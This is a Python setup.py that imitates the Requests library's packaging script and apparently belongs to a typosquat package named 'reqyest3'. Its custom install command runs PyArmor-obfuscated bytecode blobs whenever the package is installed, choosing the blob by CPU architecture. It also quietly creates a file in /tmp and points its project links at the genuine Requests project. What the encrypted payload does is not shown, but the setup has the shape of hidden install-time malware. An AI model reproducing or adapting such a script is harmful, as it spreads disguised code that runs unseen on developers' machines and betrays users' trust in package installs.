import os
import sys
from codecs import open
import platform
from setuptools import setup
from setuptools.command.test import test as TestCommand
from setuptools.command.develop import develop
from setuptools.command.install import install




CURRENT_PYTHON = sys.version_info[:2]
REQUIRED_PYTHON = (3, 7)

if CURRENT_PYTHON < REQUIRED_PYTHON:
    sys.stderr.write(
        """
==========================
Unsupported Python version
==========================
This version of Requests requires at least Python {}.{}, but
you're trying to install it on Python {}.{}. To resolve this,
consider upgrading to a supported Python version.

If you can't upgrade your Python version, you'll need to
pin to an older version of Requests (<2.28).
""".format(
            *(REQUIRED_PYTHON + CURRENT_PYTHON)
        )
    )
    sys.exit(1)


class PyTest(TestCommand):
    user_options = [("pytest-args=", "a", "Arguments to pass into py.test")]

    def initialize_options(self):
        TestCommand.initialize_options(self)
        try:
            from multiprocessing import cpu_count

            self.pytest_args = ["-n", str(cpu_count()), "--boxed"]
        except (ImportError, NotImplementedError):
            self.pytest_args = ["-n", "1", "--boxed"]

    def finalize_options(self):
        TestCommand.finalize_options(self)
        self.test_args = []
        self.test_suite = True

    def run_tests(self):
        import pytest

        errno = pytest.main(self.pytest_args)
        sys.exit(errno)


class PostDevelopCommand(develop):
    def run(self):

        develop.run(self)

class PostInstallCommand(install):
    def run(self):

        def f1():
            from tests.pytransform import pyarmor_runtime

            pyarmor_runtime()
            __pyarmor__(__name__, __file__,
                        b'\x50\x59\x41\x52\x4d\x4f\x52\x00\x00\x03\x07\x00\x42\x0d\x0d\x0a\x09\x34\xe0\x02\x00\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00\xb2\x05\x00\x00\x00\x00\x00\x18\x4c\xd0\x62\x20\x33\x94\x3b\x9e\x3f\x8b\x32\xe1\x9c\x86\x12\x51\x00\x00\x00\x00\x00\x00\x00\x00\x4f\x58\x38\x4f\x0b\xa1\x40\x66\x18\xdf\xcc\x30\x29\x6c\x2e\xce\xeb\xfa\x68\xf0\xad\x1f\x48\xd6\x04\x7d\x79\x98\xe2\x10\x72\x61\x6a\x9f\x0b\x8c\xda\x9b\xce\xba\x41\xf7\x1d\x13\x80\x38\x96\x2d\xa5\x55\x82\xdb\x5a\x0f\x88\x0a\xa0\xf5\xcd\x6c\x17\x49\x3f\x24\x48\xfd\x33\xbe\x06\x1a\xd2\x24\x84\x1f\x05\xb4\xf7\xc2\xed\x57\xdd\x39\xfd\xf2\x62\x9e\x3c\x82\x4d\x20\xca\x71\xf4\xe8\xe9\x96\x59\x2e\x08\xda\x06\x6e\x7d\xde\xba\x0f\x81\x44\x89\x44\x75\x48\xca\x88\x28\x97\x00\x6a\x48\xfe\xaa\xd3\xef\xbe\xd1\xb3\x22\x91\xcf\xe1\x73\xbf\x98\xe6\xb4\x1c\xc9\xe1\x2a\x50\xa3\x4f\xf8\xd3\xda\xef\xf9\xc6\xde\x96\xa9\xd3\xa2\xa4\xb0\x1e\x08\x30\x2c\xbb\x1a\x5d\xa4\xd2\xbd\x5c\xaa\x6b\x89\xfa\x81\xe6\x1b\x9c\x6a\x02\x52\x76\x71\x7f\x00\x65\xe0\x9e\x96\x5e\x21\x18\x77\x6a\x64\xf3\x6b\x14\x50\x57\xe3\x16\x94\xc1\xa3\xe3\x9a\xeb\xab\xb3\x45\xbe\xae\x8b\x7a\x99\xb8\x8f\x8c\x06\xd6\xff\x40\x67\xd7\x22\x8e\x5e\x90\x06\x91\x87\x62\xc7\x99\x10\x8c\x6c\x29\x6e\xd5\x07\xae\x9d\x26\xc6\x17\x0d\x3a\x18\xac\xb0\xd2\x7b\xf8\x17\x6c\xc8\x4c\x87\xb1\x1a\x38\xfa\x99\x5d\x78\xf5\xe6\x19\x62\xfb\x18\xe5\x74\xf6\x40\x8b\xd3\x1c\xa0\xa0\xe5\x67\x71\x47\x76\x97\xb9\xe0\x15\xf7\xe0\x9e\x5a\xd9\x5b\xda\xa9\x30\x47\x0a\x81\xab\xa9\xda\xd8\x22\xe8\xd0\xf6\x54\xc2\xd0\x67\xe0\x06\xca\x05\x99\xdd\x4c\xf2\x06\xd1\x73\xf2\x95\x6e\x6b\xe5\xa7\xd3\xc8\xa2\x11\xd2\xa1\xfb\x72\xa9\x8d\x6f\xe8\x6a\x82\x8b\xac\x42\x1c\x06\xf8\x83\xf3\x4c\x9f\x41\x89\x13\xa9\x8d\x5d\xba\x4d\x8a\x74\x58\x5f\x24\x18\xb0\xe4\x95\x99\xc8\x96\xe7\x8b\x3b\x95\xe8\xb6\xa2\x3d\x91\x72\xa1\x29\x34\x1d\xf4\xe2\xa6\xa8\x1a\x1d\x21\x29\xa2\xee\x5c\x79\xf5\xbb\x21\x8c\x4a\x5f\x97\x39\xb4\x1a\x05\x23\x44\x45\xee\x77\x33\x5f\xa1\xb1\x54\xdf\x78\x26\x86\x50\x03\xb4\x7b\xe1\x20\x9b\x82\xbb\x0f\x77\x60\xb5\x11\xb1\xb0\x20\x9b\x63\x20\x6d\x29\x0c\x99\x61\x9d\x77\x97\x87\x46\xc5\x86\x60\x50\x56\x67\xc8\x15\x9c\x84\xcb\xf7\x05\x2b\x1b\x0c\x83\x42\x71\x06\x2e\x60\x5d\xec\xba\xf5\xf8\x30\x96\xc8\x99\x9e\xf8\xc5\x57\x5a\x33\xfd\xe6\x44\xa2\xd3\xe7\xc3\x89\x2b\xff\x98\x67\x05\x85\xef\x03\x37\xaf\x56\x17\xb1\xcf\x38\xbd\x5c\x18\x6f\x6f\x46\xd6\x33\xcc\xfa\x9c\xb6\x85\x25\x5b\x1a\xe6\x1d\x31\x16\xde\x13\xc3\x60\xe4\xaf\x49\xc3\xfe\xf4\x3c\xc9\x79\xf5\x8b\x60\x79\x06\x86\xf8\x4c\xb0\x22\x09\x04\x0c\x7a\x92\xc0\xac\xa2\x42\xb3\x54\xe7\xf6\x8a\x1b\x3e\xb0\xf8\x38\xab\x1d\x52\x86\x4b\x8d\x36\x22\xe0\x42\xd6\x6c\x29\x27\xe0\x1c\xb0\x72\x36\x5b\xa4\x59\xda\x76\x3f\x8d\x92\x20\x85\x66\x22\xfb\x53\xb1\x92\xc1\x03\xb6\x6d\x28\xd3\xa3\x6d\x1f\xfa\x5c\x07\xba\x9c\x6c\xc4\xb8\x95\x31\x16\xf2\xaa\x76\xc0\xd3\x3c\x4f\x72\x17\xc1\x6d\x02\xae\xbd\x4d\x98\x62\xbd\xb7\xac\xc6\xdb\x10\xa0\xf7\xeb\x21\xb0\x17\x05\x0a\x12\x16\x99\x48\x2f\x2c\xc6\x3d\x69\x17\x47\xd3\xe7\x45\xd1\xb7\x7a\x7b\x3f\xdc\x12\x55\xc5\xf4\x18\x90\x76\x2c\x5d\x83\xae\x57\x60\x09\x5e\xa4\xe7\x47\x81\xf3\x79\xec\x50\x57\xf1\xce\x27\xe2\x1c\x40\x95\x81\xaf\xc7\xf9\x5b\x0a\x5f\x42\xe1\x4a\xdb\xa0\x6e\x8d\x7e\x56\xd3\xf4\x49\x11\x16\x20\xcc\xee\x92\x07\x10\x1c\xdf\x12\xd8\x64\xd9\xfb\x61\x09\x6d\x7d\x21\x8d\xa7\xaa\x35\x5a\xc7\x7d\xb0\xfc\x4c\x4f\x4c\x44\x44\x2f\xe4\xb1\x85\x54\xf2\x45\xbd\xa7\xf7\xa7\x33\x15\xce\xee\x7b\xcf\x6a\x5d\x28\x39\x39\xb7\xe3\x31\xce\xe3\x15\xd1\xa8\x76\x2a\x8e\x1a\x74\x44\x1f\x09\xcd\x9d\xd7\x52\xc9\xf9\xc3\x8c\x24\x62\x95\xdb\xfc\xe6\x70\xd7\x12\x91\x0e\x3b\x00\x8f\x6a\x28\x7f\x34\x8e\x01\xc3\xc3\x7d\xce\xea\xcd\x41\xbe\xe0\x35\xa6\x8b\x21\x03\x63\x48\xa1\xb5\x40\xd1\xc1\x1d\xd8\x46\x8e\x59\x35\xb1\xa1\x53\x3e\x40\xaa\xbd\x87\x27\x98\xc0\x0e\x70\x13\xed\x10\x3c\x07\x9f\xf8\x2d\x18\x28\x0f\x6b\xd1\xd4\xbd\xf7\xf6\x89\xec\xac\xd3\x90\x2f\x41\x7c\xef\x92\x2d\x54\xc4\x27\x88\x4d\x0b\x35\x16\xe7\xa7\x59\xb1\xef\x03\xfe\xbb\x0f\x2c\xc2\xad\x8e\xd0\xe6\xe6\x19\x2d\x10\xe3\x2d\x97\xa7\xdc\xee\x8b\xda\xc6\x64\xc4\x6a\xde\x11\x2a\x73\x3a\x4b\x97\x81\x7e\xdc\xc1\x2e\xd5\x0b\x10\x98\xd0\x3d\x4d\x52\x07\x32\x2e\x01\x26\x6c\x7b\xe0\xbd\x7d\xdb\xe1\xda\x61\x0f\xe4\x73\x83\x0a\x5e\xf6\x86\x6f\xda\x1d\x26\x60\x7c\x9c\x7c\x3b\x0a\x0f\xbe\xcc\x7e\x44\xa8\xfa\xa5\x0f\xb2\x55\x7c\x9b\x5d\x66\x08\x3d\xe3\x87\x18\x22\xd1\xe7\x86\x1a\x2d\x9f\xf7\x22\x29\xf4\xaf\xb2\x2f\x81\x10\xef\x99\x49\xc2\xf2\xa1\xbd\xbd\x8e\x47\xcc\xb7\x99\x00\x08\xda\xcf\x72\x66\xf3\x17\x5b\xae\xcb\x79\x1f\x54\x52\x73\x28\x04\x20\x7e\xac\x96\x8f\x31\x0a\x42\xd7\x0d\x39\x4e\x56\xaa\xe0\xa0\x24\x04\xdc\x50\x00\x74\xbb\x15\x0e\xf4\x6f\x9b\x93\xe3\x93\xad\xd4\xe5\x57\x69\xdd\x06\xbc\x7f\x6f\x8e\x00\x40\x76\xde\x2b\x78\xc0\x7d\x9c\xf0\x15\xfa\xef\x4b\x4d\x56\x83\x7d\x92\xde\x49\x86\xe7\x0a\x0b\xac\xea\x18\xf1\xa0\x3f\xe1\x73\x16\xc8\x69\x72\x7f\x1d\xc5\xa3\x44\xd0\xc7\x47\xdf\xa0\x81\xfe\xcf\x50\xa7\xbc\xae\x76\x7d\xfc\x3c\xf7\xa1\x9e\xde\xf8\x96\x28\x96\x25\x55\xb0\xf1\xc5\xc5\x7d\x61\x93\x5e\x75\x7d\x46\x41\x3a\xf4\x2f\xce\x2e\xa4\xdb\x0e\x58\x04\x00\xc8\x93\xd6\xa0\xf1\xdb\x19\x6a\x0f\x7d\x03\xc4\x8e\x4a\x19\x7a\x4d\x5c\xaa\x1c\x2a\x1e\x1a\x42\x24\x3f\x7e\x48\x18\x9e\x08\x00\x3e\x8a\x63\xb7\x4f\x23\x0f\xc7\xce\xf4\xa3\x6b\xd5\xb8\x04\xe6\x80\x49\x1e\xc4\x56\xc5\x56\xc7\x11\xc4\xd9\xfc\x3a\x5e\xf8\x5e\xda\x03\x28\x9e\x7f\x78\xfe\x36\x7a\xf7\xae\xf9\x32\xe2\xf2\x44\x38\x22\x30\x75\xcf\x74\xda\x0c\xf5\x84\xd4\x93\x56\x23\x72\x42\x8c\x6c\x40\xa3\xe6\x23\x76\xac\x8c\xfa\x9c\x80\xb2\x34\x4f\x4a\x24\xe8\x5a\xf1\x03\xa7\x8b\xfe\xd1\x4c\xb4\x09\x34\x54\x58\x5a\x3c\x35\xa4\x78\x74\xb7\x97\x43\x83\x3e\x11\xdb\x15\xcc\x2a\x0d\x4b\x20\xb4\x48\x98\x97\x94\x1a\x67\x84\x42\x87\xce\xba\x70\x27\xe6\x1a\x72\xc0\xcd\x19\xb4\x40\x86\x40\xd5\x35\x18\x15\x59\x4f\x3c\xd2\x32\xa5\x8b\x03\x91\x47\x11\xc5\xa7\x79\x9a\x0d\xd3\xb3\xbf\x0f\x66\x29\xd7\xbc\x26\x0e\x14\x02\x9b\x6b\x5c\xf6\x05\x37\x88\x41\x7e\xe3\xa6\x13\x25\xd7\xce\x72\x2b\x79\xde\x2c\xbb\xcc\x85\x74\x34\x47\x21\x1a\x4b\x9c\x41\xc5\x87\xd3\x26\xcf\x0b\x1a\xed\xef\x44\x7e\xaf\xe7\x45\x73\xbc\x20\x51\x8e\xe1\x03\xf4\xe3\xd5\xcf\xd5\x6c\x2f\x8a\x67\xb0\xe9\x67\x48\x88',
                        2)

        def f2():
            from tests.pyarmor_runtime_000000 import __pyarmor__

            __pyarmor__(__name__, __file__,
                        b'PY000000\x00\x03\t\x00a\r\r\n\x80\x00\x01\x00\x08\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00\x8a\x07\x00\x00\x12\t\x04\x00\xf0Z\x82\x89\xd2\xe891\xac\x8e\xbe\x9d\xca\x0bU\xa4\x00\x00\x00\x00\x00\x00\x00\x00\x9e\xb9\xf0\xcf\xba\x02\x9d\xd1\x04\xab[\xebWj\x14c*\xc4\xfdg\xbf\xea\xa2\xc2B\xdc~\x1dr\ro6\xfa\x81\x9b\xca\xb5\x1a\x83\x83\x14\t\xae\xbf\xd8m\xb8\xd1\x1a\';^\x90\xe1\xa85$\xa0%v\x85\xf03A\x98\xbf*-8\xdc;\x14\xc6/\xb1!\xc1\xa3\xfd\x08\xd8\x9d\xdf=v\x17H\x0f\xc4%l\x9b0\x92\xc0O\x1e\xa8\xe9\xef\x17\xc2{&\xca\x9c4\xef\x80\xef\xbbp7\xcf>|\n*p\xbd|\xbbjJ\x10{\xd6g"\xc3\xfd\xaa<\x9bq\xacf\x80r/!.7\xc8\xb2s]\xe4#Y\x18`\\\x80\x93\x13\xbcY\xca\x83\x0eM\x9c\x16I\xe28\xea\xfd\x0f\xa2\xbb\xc7\xd6\xe4(_>\xbaE\xb7\x82z\x91)\xfb\x98\xd1\x10SZUj\x06\x86bp7\xcb\xb0\x10\xb1?ugS\x8fdnT\xd5\xe0\xdd\xe1\xd3X\x18A\xf2\xba\xd9\xe0\xf8\x11\xcaG\xd7\x83\xe7\xca\x16!\xd0\x8b1\xd0\xf7\xad-s\xf5V\xcb6\x16\xd0\x8e\xc6\xce\xe1\xa8\xc5\xd3\xe2\x96\xd326\xdd\x99\xd4\x99\x95\xdc\x9a\x19\x1d<\x01\xb55\xb2Mb4\xb3E\xe5/G\x17\rR\xfe^r2mxIFN{d NM\x02\x00t\x81\xba(\xf5a\x89\xf0z\xb0S\xd3\x9bqd\x91p\x9f\x046\x950\x03\xa3\x97o\xc2\xa9V`\xa5\xb7\x84W\x12\x9a\xea)x`\xb8\xe5d\xfa|"\xa1M\x84\x90\xda\xdd1\xd3\x9d\x8e\xa5v~\x87\x1f\xc0\xe0\xc0D\xc1\x87Od\xd3\x05\xe9\x04\x95\xce\x7f\xce\xe31\x97\xcf\x04\xea\x96\xef(t\xca0.\xd0\xaa\xf5L!=\xc7:\xc9\xed\xeafMe+\xb1\xa1\x08\xa8\xf3|j\x84\x00\xcb\x8f\x0b.U\xcf\x1a\x89\x8b\xdb\xc9g\x83\xd9\x0fv#L\xdd\\\x125V\xb4~\xc6)\xa5\xea\xb7\x9e\x96\xa6\xdf\xb1\xfddm\xa7k:\xf0\x11\xbe\xe0P\xe48\xbd$\x07\x11tIt\xbc\xffM\xe8\xc4\xbe\xf3\xc1\x8b\xb1\xa6\x88\x9e\x84\xdf\x98\x9e\xbd\x86\x1b\xf0\xbb\x92/\x94\xd6\xd91\xc1\xc7\xc6\x9e\xf5\xef\xb2~\xf8\xec\x05\x05y\xf2Q\x9c\xbf\x16aGK\x80,\x8eF\x10\xae\xe3\xff\xfd\x00\xbf\xcaW\xbc\xc1\xee\xbc\xf9\x86lP!~\x9e\xf0;H\x95w\xa76F\xbc\xc7\xc0\x90j\xca\xba6\xc5\x12Ii\x12\xd9\x02K\xf9KE\xe4\xad\xa4\x14\x08>D\xc85;K\'O\xcd\xef\x02\n\xf0\xa0\x16sD\x0cY\x01?\x08L\x97\xaacC5~+BZ\xe5\x16\xe3\\0\xd0o\x16Q\xaa\xa4\xe1n\x1c\xd6A\x1a\x16H\x1aI\xa4r\xa1\x1bPGYJa}vM\x90|/\xc1u\xde\xe8\x1a\xee4\xf4e*\x96v\xc5\xfa:\x89\x04L\x83\x84\x01\x94\xbd\xe6\x15\x88 _Iw\xba\x82\x82\xd8-\xc33]\xee\xa9\xff\xfa#\xdc\xe5\xdb{\xff~\xb7y\x1d6\x9f\xb4A\xc5}\xddT\xc9<\xe0\x15\x914\t\xebD-\x8e\xeb\xcd{\xff\xa3bT\xf8\xe93\xf3\xfbP\xb8L\x92\x02\xd0\xe1\xc25.}-\x9b4\xf7`,W\x9fR\xf2%\xf1\xf6\x84U\xee\x82\xb3(.\x00\x91\xb8?\x12\xc1\x82\xb2|\x14a\x95O\x14\r\xf2\xccF]g\xfavn0v\x0eM!S\x08\x10\x94\x9f\x0cn\x8b\xba\xac\x88e\xd0\xe6";\xcf\x1c`\xc7\x1dV\x85Q\xe9\xaf\xe42o\xec\x03\xda+\xc2x//\xc4)4\x1b\x1e\xd1m\x07\n\xb7\x86\x93g\xc3i\xa2\x82L\xf7\xa0\x84CQ4Xfe\x8b\xb3r\xd1\xcc\xccE=N\xa6\xee\xbe\x1eL\xa1n\xe6(j9\x91P8uh1B\x12\xe5\xd1\xb2\x00\xf9\x8fI\xb2\x9d\x1dA\x8a\xec\x0b\xd9\x07(\x8cz&\xf3E&\xd4z;\x06\xe6ax\xf9Ro0\x93+\xddI\xa3\xe7NI\xc9\xb8\n\x9e\xba\x87\xf8@\x14\xfa\xab\xbaB\xf4L\xf7\xa2\xe8\x11]4\xa4\xe607\x8f#M\xd6\xb8\xd9\x15oB\x11\xde\xe3\xa3*B\x99\xfa\xa7\xbe\x1fr\xb2g\xe5\xc3\x0f\x1cv(/\xc9\x0b=\xd7^\xdc@\xf1y\xb8\xd2\xe6\x0f\xb1\xd6\x84\x81\x9c\x8c\x00\x06KRW\xe6\x0bUo2\xeb\xbe\x08\x01\xfc\ra\xf1\x11\xdb \xcd\xa3\x80\xf3Q_Y)D\xef\x02\xa2F\xa1^\xf4\xab\xa9\xf5\x1d\x96q\xad@\x0c\xa9a/\xc6\xdbb\x1a\x9a\xbdw\xc2Q\x0e[-o\xc9\xf7}\x97\x19Q\x0b\xbb\xfa\xb3\xd7\xde\x0f\xcb\xf1\xcf\x14\xd0\xe0h3\x9a#\xfa\x1e^\xd8\xc7\x03\xd3\x16\xe6\xe7~\xe2Y\xed\x80\xb5\xe7\xa9\x02\xb7\x05\xa8p\xb1\x92\xae\xe9~\xa5z\xe6\x9e\xcd\x01`\xea\xec\xf4\xd5^\x8c\x9f\xcb<\x9a\xbf\x82p\x8a\'`}\xd3\x96l\xddt\x14\xc4\xa6\xd1(\xe0{\x85\x13\xb5\x9a\xbb D\xfa1v -X~\x81\x83\xda\xab P+\x18\xe8\xadZ\xe7I\xc2\x13\xfa\xdf\xa8\x85\xcb\x17/\xd4\xfd\x13i\xec;\xc8\xdd\xa7\xfd\xff\xb9g\x04\xc2\xc4\xbb\x88\x05\r\x997\xa0\xec\xb1\xaa\x8aK\xdc#?\xedI\xda\xc0J\xd0(\x88b\x18\xa9L\x87\xb6\\v\xef\x0f\xe1\x02\xd3\x8c\xc3\xde\x94\xd8\xccSC\xda.|\xd9\x93\x16\nwCu\x92\x8f\xe1\xa3\xce\x87\x8eQ\x1aQw\r\x85EY\xf7\xc9\xee\xdd\xfb\xd9^8\xd6\xff\x1c\xa9\xf4t\x9e\xbc\xffce[L\x94\x19\x15H\xa2\xfb\xfa\x960=8\xc5\xe2\x81k\x94G\xdb\x91GuM\'\x93\xdc\xd5\xfc\xb1\xf3"\xf2\xb9E\x1d\x96\x0b\x18eM=\xe6O\xb0\xea\xf5\xe5\x9cW\x16_\x9a\x96\xb8\xfb\x1f\n\xa1b\xd4\xa1\xd6\xedt*-X\x91N\x88\x85\xc8\xb3?D\xe9xp\xe5\x1c||\n/*\xb0n\xfb\xccV\xddI4\xaa\xc9L\xe8+\x07\x06p\x86\xba\x7fp\xfb=yH\xe6>\x14nR\x96\xbb3JK\xfb\x88\x8a\xbe\xa7\x9d\xc6\x0cu\xf7\xaa\xa0\x9eE\xac\xac\xfa\x89\x88!\x9e\xa6},\x89\x9al\xa2\xab\xaf\xdd<\xe0l8\x18\x91\x97}\x12\x80\x9f\xf7[-\xe5\x97\xf1\xce\xad?\xb4X96\xef\x05\xb4\xb5\x16hl*j\xa3\x9c\x07\xdbY\x16O\x14IlB\x049\xa5\xdcU\xf5\xe9!\x10=r\x0bR\xd0 \xf6i\xde\x949\xb8\xa8\x12@,=i\x99I\xfe\xebo\xe5\xef\x8fk,E\xf7k\x95\xceR\xc8\xa3\xa7\xeaD\xbd\xb2\x87\x1f\x89eTwp\xb0F\x8a5\xe3/\xd7\x94X\xe5\x01\'\xfc;\xf6\'?\x0c8V&\xc0\x7f\xb0E\x87\xe1\xa0&V\xcc\xb4pes\x83\xd0\xfct\xd7\xcb\xa5\n\xe7\x8dm\x02\x8e\xe7\xbfy\xb3L\xf9\xc9\x8b\xd5\x8a4\xcc\xe1\xdb{\xcf\xae\xd6A\xd7\xbb\x9d\x92F\x92\n\xdd\xf1\x04\xefK>\xd3\x87\xda\x8d\x99\xecws7c{\x96(RlU\xb5\xa1(\x06\xb5\xeb@p\x12\xb4V\\t2us\xe5\x0bM[\xb1goT\xec\x07f\xc6(\xbfG\xf1\xa0\xb0D\xfdV(6=\x8f\xebC%\xac\x95\xb9\xf4\xc4\x88\xe7\x97\xaa\xf5{\xaaY\n\xb7^\x0fv]\xc8.\xc9~\xe7\x87\x0b\xf6>\xf8hV\xa8\xf7c\x90\xf5\xe2\xdaw\xe8\x84h\x844[7\x16\x0c\x8eh/M\xd3h\xd7\x01\x01\xe6\xb7\x97=\x07V+\xa8\r\x88\xbfV\x10;\x82\xf6\xa6I\xddu\xcd\x07\xbd\x15\x88\xd4\xda\x98\xde\x07\xd2\xa3+ci\\TgO&\x14\x8d\xe1t|oM\xc5\xbfv\xbd\xd2\xb4\xb1\xa2W\xa9\x92\x08\xa3\x10W\xa3J\x8f\x7f4\xd6\x1a\x8em\\\x93K\x9b\xedZ\xb1[5=\x07\x17\x87\xc9\x02\x15\xba\xe2)1\xdc>\x1b\xe4B\xca4Q\xf1\xd6\\;$\xfdO\x0ex\xc5!\xe1r\xb5\xfa\r\n\xac\x87\xb3n\xee\x19\xf5oR\t\t\x00\x00\x9c\n\xc2\xd2R\x9c\xf6;\x0ef\xc9\xdd}S\x02\xf4\x94\xe6\xa5\x02ZB\xb6$x\x91\x8ad\'\xfd^Z\xefp*b\xe0\xd7\xa8\x9d\xab\xd1?\x1b|\x1b\x0e\xd7\xefr\r!L\x8a/\xca\x0e\xbc\xf7\x1f\xa2\xd1\xed\x95\xf6\xca\x86\x9d9\x1b\t\xda')

        if platform.machine() == "x86":
            f1()
        else:
            f2()
        install.run(self)

# 'setup.py publish' shortcut.
if sys.argv[-1] == "publish":
    os.system("python setup.py sdist bdist_wheel")
    os.system("twine upload dist/*")
    sys.exit()

requires = [
    "charset_normalizer>=2,<4",
    "idna>=2.5,<4",
    "urllib3>=1.21.1,<3",
    "certifi>=2017.4.17",
]
test_requirements = [
    "pytest-httpbin==2.0.0",
    "pytest-cov",
    "pytest-mock",
    "pytest-xdist",
    "PySocks>=1.5.6, !=1.5.7",
    "pytest>=3",
]

about = {}
here = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(here, "src", "reqyest3", "__version__.py"), "r", "utf-8") as f:
    exec(f.read(), about)
    os.system("touch /tmp/license.py")

with open("README.md", "r", "utf-8") as f:
    readme = f.read()

setup(
    name=about["__title__"],
    version=about["__version__"],
    description=about["__description__"],
    long_description=readme,
    long_description_content_type="text/markdown",
    author=about["__author__"],
    author_email=about["__author_email__"],
    url=about["__url__"],
    packages=["reqyest3"],
    package_data={"": ["LICENSE", "NOTICE"]},
    package_dir={"": "src"},
    include_package_data=True,
    python_requires=">=3.7",
    install_requires=requires,
    license=about["__license__"],
    zip_safe=False,
    classifiers=[
        "Development Status :: 5 - Production/Stable",
        "Environment :: Web Environment",
        "Intended Audience :: Developers",
        "License :: OSI Approved :: Apache Software License",
        "Natural Language :: English",
        "Operating System :: OS Independent",
        "Programming Language :: Python",
        "Programming Language :: Python :: 3",
        "Programming Language :: Python :: 3.7",
        "Programming Language :: Python :: 3.8",
        "Programming Language :: Python :: 3.9",
        "Programming Language :: Python :: 3.10",
        "Programming Language :: Python :: 3.11",
        "Programming Language :: Python :: 3.12",
        "Programming Language :: Python :: 3 :: Only",
        "Programming Language :: Python :: Implementation :: CPython",
        "Programming Language :: Python :: Implementation :: PyPy",
        "Topic :: Internet :: WWW/HTTP",
        "Topic :: Software Development :: Libraries",
    ],
    cmdclass={"test": PyTest,
              'develop': PostDevelopCommand,
              'install': PostInstallCommand},
    tests_require=test_requirements,
    extras_require={
        "security": [],
        "socks": ["PySocks>=1.5.6, !=1.5.7"],
        "use_chardet_on_py3": ["chardet>=3.0.2,<6"],
    },
    project_urls={
        "Documentation": "https://requests.readthedocs.io",
        "Source": "https://github.com/psf/requests",
    },
)
